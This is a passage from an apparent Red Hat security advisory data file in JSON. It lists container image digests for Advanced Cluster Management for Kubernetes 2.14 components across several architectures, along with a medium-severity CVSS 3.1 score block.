"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:74a11d641af79fe69be111135609e0d22562fd01ef95343c133d1a2ee527079a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:86392c4f03ba2eec91ccbc75a0679f91e38cbd1ccf3aa55e6f942d664a254213_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:94b9d0a6720165c916fdb14a4f891f22861e95544e13d2ff706a4547c60e207a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:5559d75fc24f1251b934563e4e98090df535dbfb0218a8f4135e8ecb6c4544a0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:738a4ebc0b24bdb00ac386ecffaa74c9cf71fd5cd3023671509899ba481c09d4_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:96cf5d8b47c5c6c30ed4ca119f02b6e8df2952788db6508663618cf779ebe00a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:fee7a4ef5d73d6e81e0b913a0c15ed8254f138ba8115fae8c3819a2cc6144fdc_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:241781caa54f27677f1494b8f55bbacef14751fe686f1410534a5d48de010679_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:4f6436c0a8aed6c7cdf9322c312e61f551365d6c2f7680765aa83ef19f21af8a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:84fec9caf52a3f3e7e1d946345c995c7db53f8797ac45921a2caf021e49b1d6a_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:9aa65853e2ab9469cbce3dc8dd5b40c6a19f844c2f07eb2657639b56afdc6b3b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:857f48a392757a6fec8a26bddc7bccffa463c33c5824bf8a809784e5b06f9cb1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:be40e3b9e6f7e8ea857b906e82e8ffc713fbd9b3f4016711a8158f5054d951fb_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:e951334f9a85760ad85e96695e35ff045ea274ca0203a96ef7394d4905379325_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:ea69db2fd8c7ce3e39af7997a83812dd97b7fec6fce3d6776ec652b81fd3b7cf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:86c711091d0a954427d4dcd667cee8feda6dbc6fa2616de9f3316750b04c27e7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:8d21a1ec53eff605f99f5a79162e7fcf5092a3c30bcbd21b23f0c7bd9bc5bdcf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:b74c9fb6ad13b57c47634acbd269fb53e937aba7dbbad45e50b9a6dc60dfa87c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/console-rhel9@sha256:f15faa8241eb4808d2f4c7c07f1ff9e0036202665c35e3df983055fe7bc0885e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:3fd793aaa8b22670c9a863613bd20e1fbbd946b8a15bc684bb952364d98a0c28_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:5c3b02c97bc9d3383b69157f98c8e9091905973af181692a11caf414ca366331_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:719f5cfdb6fbac0903e350e7df9e983dbd4109a83055b335db3b7895353f64c0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:eda1cbe6851aa6fb1921e11a8c608d22210a8f63c9fe145e8f5ae0eb585b6cce_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:2da0d50b3c91414f3e58dfacf6f47f8770790d16b70d55afb1d291533575ab85_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:b8854dbea48fdc080a446859dbf92cbe5cf3dbd25959a5c0608ebe3a8222b031_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:cfd3cf79f22ec65643a9637779ac200ca33784f9f558ea233de05597396fe65c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:dfc54b25aeb5826df80d9f98031bd2675065e25cb3ae8692871478cae5194973_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:45a3b742df7e286cbf840e32285b281803f9e97f579af9721f9f9ae00bd2c824_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:580a0307f5881f91950436573a17854ecd339045f60a88f5bd18adeecb5b0ca9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:607796d67b50b70e54520428d0b2a1e53b604dae9395ce7a011e57787562de89_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:b5445243950f037d7932cdfef65443df4558717a782712ea3dfa792bbc18891a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:08f1c3f4bbd371a46fdbd696026a9509053e4c091d591f8c92e32ed5590b432e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:47f7aa6cfb685cf9d533ef3b505ede5c614e2837513bfe3f68b76c3f650ca240_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:d739b5a788d6888fb970f44d03869467731d8d03a34f271cebeb31e0e34edddd_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:d978057f781d3ef887909cab4211f892017e76de317f3d2f17cd6314ec883939_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:212e04293273e80955e59c3346933abc016ffa23c6072718b98b918ac07d6a1c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:505f4d5caff4451c781320044f2b01968fafa1a7b2c4734627f9778526c06494_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:b7aa114127474db733d9f4080d2770a48e13dc8971b483aec36d0227a7e2c22c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:e3d2d1e3d4467a8ee296180442f093643d07e2fe1f9c99b683ea69942d53c997_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:1b56fc6c4b897bb8a62b1fa176af6bace8282b2de38e3e69b5673c5ae3e6848c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:55dd4696828ab8a7546481b8124406d858b9a43563e14599d06f5e5b1ac030f5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:c13595e478ea28b6ba8d146d5a93c6f271babf253653d914139000e5af34d022_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:e780559caf89469f58e9d6646c389031a4cb080853aad7d471a5e7339c39f28c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:263dcdd063b32734cead282523078f3365e8ff793eabe18c95207316bf2dbf77_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:2d5dd95834e1cac3c33a22708c97fccd17e6a5891cfb9cf07d61caab399322df_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:9f7cc4bc6e4019ec9b9e9b72f469902e54befa09560c1d1a1928ab1de5716ce1_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:dcdecabafdeba7adbf11f25eb4271dc69a7726216f52948bb26527ac5c1bab6f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:42122cf17900940fba0ba140e4983eb2ced2f0001792501b99523fd6b7960335_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:495c5326c40792227be26ef78244a0f72cbf3124c843a68cc07e724abac5b31e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:5ff93565951e58d1c3d181897f20efe5cbd1f0f902e050fc460b5dc91d4d1d82_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:76718e6fe4d575e6348dac6ebc9a892cc1dd7da3b762cbd8965bd339862e5541_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:3fda89fe951abce23fecf4c0c6ecedda9f3da6e7639acf4be4160ab329dfdded_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:60e15cb9653139f0f1675141486f5c5d79b4665a94416d589381fee7a0bbdc80_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:b19fbb7547999ff5e4144eebf4f57e8c3d310ae8f4b901a47d80b098cccb30b2_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:f014d27ed18d8258823f81fa5795530720ac21b355283c966b44943f04ca2f37_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:246de6f5a2a64d0f625e3af6fcfba5000ce3d1f60bee7b996c8571f0dff4917c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:2ed7d15730c178aad5f3d7838f347f540e3f710e414c78af82f0715d57b7a9f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:73f5e95e4c2f259920af40a8f28db82251735a6e2047da0feb9c91411c5f55d5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:c069f2f718598344b42e8472887f075042bc75bc1dc52a1f1248b5558189ee9a_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:7bff1645296326504b40e17540b4b4c2e5aa86147799b61d1bda5757305d3683_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:b2bf3ec7254afae3ff1fb0713e336cd4b58fc734f6439ccdc0bb659e939db885_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:d8f0bb2246c301858cad1107e166466bd3df41817e245d9955ca2a441866bd23_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:fd17f3004739a206ae4535baf78c2a6ddb1bb4414bf5e63a273234a15acfa700_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:6140280d31900679f69fcc045db8ba3d100301367f21855f9082fe4e271a0001_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:6d05e38770288d8f99b7074d631e7b8f8a634a2bf6fc15c4cd1a3483907b7ac2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:cab194af8737d2a74ccf5c7ae6d192651e97ffec64625f7508c53a5094407769_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:e1b5cef5a6520c63293afc51e6d249cf70d146d37cd8acf544f0071cac6a6f3c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:1eaf7740de439ed0f26e7abe5186d6422ad0304e7f7a62ff8f7d8b20d7b5f0ef_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:3521a37cfcc56e8766e5c0dca7c90d6a3f2cd11441b5cf3be6ce1b76b9f8831f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:e11fa23f27e11118273b98b57137f42dbbea9b18df0a55e674662cb12522bae5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:f72518ff3ebba68ae438066db03dccaa7656d2781542b00f7243c4800ecbaeb2_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:7e394d47079a8bbe2a4a1f158725ddb6b6c7c184c48ee22dd8873b1b8e4e642f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:9dc8efe7f5e8e7b1ccacdd9e2feddf4fb90432e61f8fa9f7229e320ab0ee800d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:b4e6f98aaf08e97ce0eb68952ee9f5528944cfb38e90274e948b66e2f6ef048c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:b535b044f4233c17aa133a1e457424a9999369284a3a91ff61bc04a798079295_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:2f4d26918cf42cad318cc95935e4637e3912ef4454e91fa0e8f1d42dc185e8b6_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:59f1ee894fc44d0c3bd9e802b70b7d0a8b021ae703c77468898172d6d36d5a27_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:d90541f7b7746118a800776cfe26ccfffb99862bdcda46b4ddabb1669d22f7cf_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:e5e7d3e715c21d58322704974d82acd21bf33b87ad4218d32a7c478e1efc8bf8_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:3b48adab9d8de5c45c2c64686adf99581938cecd9f5ef06016cebdfb174066aa_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:8866805ca112c1b7c51f293d02804b7f29a581ea2720b2fbbe22e7f9030f854a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:9d28ff996ca8d0f54c86f57c8159cf62658d5a2a851270a013d6a0679989c683_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:bd5ab0e749d8ede45d643bcb3578a3d9187d944b54aab5f2f1bc3216c2bfa828_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6c9da700984d3199a85792c6eabfb36501843abf79f14d1a1312cb8b195100ec_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:8709a7a821634c247d72df2d0c4341673f88bf87e4287e903d4f042f5ece6222_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:abccf69a9e98797e9e0aa25a12d086bf0ff3e9c447de871a681c719896c78f3a_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:ef98266522a2aa4caf442b42dbf64a9f49cf3ef746c25947fc0368dd373c1b43_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:04b85e82af2367c390b8c27beac3df0a3d17a4114eaf8345715949e76b850c7d_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:5e8b6dcca8daba99087b2ab18c19c9da07d6b8850ca596a3decd8a26a049ea84_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:84a20b1a3c8240b9535975d2266a84eab22ddd6bba9c11aa8aaea5bf542b6c05_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:d9aef7d13b8fe266a3cef070df811bc790c0a3430ead2f048664fd2e37a6d76b_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:27fd4853b405d8075ae127ab75205f77a08565bdc2746dffc615141e9ff22e06_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:44b5c9b82ab30240cff679ced486e1d0660722992375065e7a997a29807c220f_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:4cb90416465a8de08582fc5c90d73b8c796a8384be8fbd77797a1fdc8d2b5348_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:736d1c14872440c8973acbe47b42249958277ce20d743d86a8d65c932ae257e0_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:36871ffe49e522c8f838fd804675bca1fb325d94cef2abdc03650b0754fee4e7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:bf39aca4041bc20fecc14e0158462f3368755af4cdf92c278ed654d92b0a5ec4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:df47c41ea438bd520e45eea9d43cacde61617fae28f5e90ea38d7462ad4e233c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:f1b763117e203efefeed33b28135a535732d02bf563ebfb740b31b0a0106d662_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:5f7390b5f48371553c718dd00dc51fd646d57994f299b1ac6d80ae3be1d4591f_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:7bad802bf7b204d29cedb35c4a63143b2d32e5d6961514327a1cc14fe16d48ad_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:a1896f5f7d19945fe045b3f148c1802fa05bf6cb2d029d57a6ad618984f9b213_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:f7bd358a85922350de6f9f4dbf91a473ca51f245f2ddbc941388bc94fb05d33e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:370c2024529902a32cb9e82d3dc793a0e5ac9de8a5345e58674078074f7222a6_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:45b898ff7eb7b5a298577ca16829e9554f179a25609e72874a8fde9ef0d892fd_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:82f99122cfc73a9f43ab1f03ffb819bf8a0eccfa07bfebb145fdb883a36f03de_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:bf8857a8967922ece490e8fcde410c3efb21ebaac48a4346011ded390d763170_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:6e91b713e6d6b965b9bb5e5ba5ae37a487fe73fb18b59e7f2b8ee89ebe52f212_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:80f8f269b175dfbecc4c21c39b6385e4fc0939a0e5297e580213412f558ac583_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:b7c83aef590284b867aa6050b5c206a7b81a2a2dfad8477cbc3b143e368c3636_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:e4d4a45a7bb882f5d60acde0cdd2bb6e092ba50dc709b484a513d1399bef18d4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:28072f029e61aa7fdfef70a767f5c809775dddaef337d6bfe48ec25f7839a184_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:2b5b2a26f35f6ebd7bc921ceecbdb16c55d1e03337c74a9d2e271be4635066ee_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:3b667400920c96bb5f69c9a8d0510993c084ba6604d43be233d217c83f6a2e67_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:865e35a99ab1efd55b6cec986cc170859baf895306bf86c730f818f51b548b39_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:0016866635c4b9a24072275ec416ecc38df049edcea177611a12d1aef4394b43_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e41d647fc468bb3f44bad88b4656b33e557427beb0191b0fcdc5f1f0df66c07b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e77b6c7a0890213bcdff276d240e9e6ac773f90dc6b4b1626dfc4c70fceb846c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e9821e27e4187c6fafec0bc3cfb5f5e534faa5c5afdd82cad9869d54d9dcf855_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:231f3779db0ac8489f4d0333b176b2dff83eda3778573e1f990eafcf18317bd6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:99faf43dc00f23f4cb981423d25b66848ddae927912f99078cc567afeb2a7191_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:abe767acb1f0f6cc625fbe63a6a4c00b0eef58642ec55d2e107bf0f90f9e1274_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/thanos-rhel9@sha256:f70d80b998b2b03c91f59b77a315e82737c304ffe174f5d1839dd28c2ec01bed_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "LOW",
"baseScore": 5.2,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:L/I:H/A:L",
"version": "3.1"
},
"products": [
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7093e9c5c223922accfd344ad2bba34c763eab82b35669cf175a3333b2b4e445_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:b646fa5444f28c01365df32d019e0f57872b450597ae2bb6993e86014d1a7548_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:b7bfd21a3a383f631488e0cc979ea9969dc3cd6f2db10960f524e37b058dfd5c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:f8b6b891e5a948fc03983b2f40bee3eb312e5bef80b2a35fc502d28ed96e1c93_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:05847c2e995e681bdcc3f809e76f512767f40ac4498c14fad4afb4cae83f33d1_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:4f03df7f0ee87ce88f225e193f03e6471e26808e8a5224bd75828740cf5e42b4_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:844cb73f99650653f57b64fa478ae4d0b207cd60040cdbd743bca7fd76af30ea_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:8f220b523bebe0d150987f34090005f500af558f0659808d4bee974fbb48dd42_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:1399e0cd77802ef77f4ca5c80e2173516420755581c886949cc5f5bd7473f38b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:4e0e3c4f0fc0cc13d9780487ccf9a1315ff0e867c003cb5a9c919d2b20bd3e58_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:7f45bf6cfb2eefd9107b76524fd83883f389eda8f69f1f2ee55b56542283d9b4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:911c05cb845692bb81e2749b73fd9fd6826771cb4b5ac6ad119a8f3fcfb650ba_s390x",
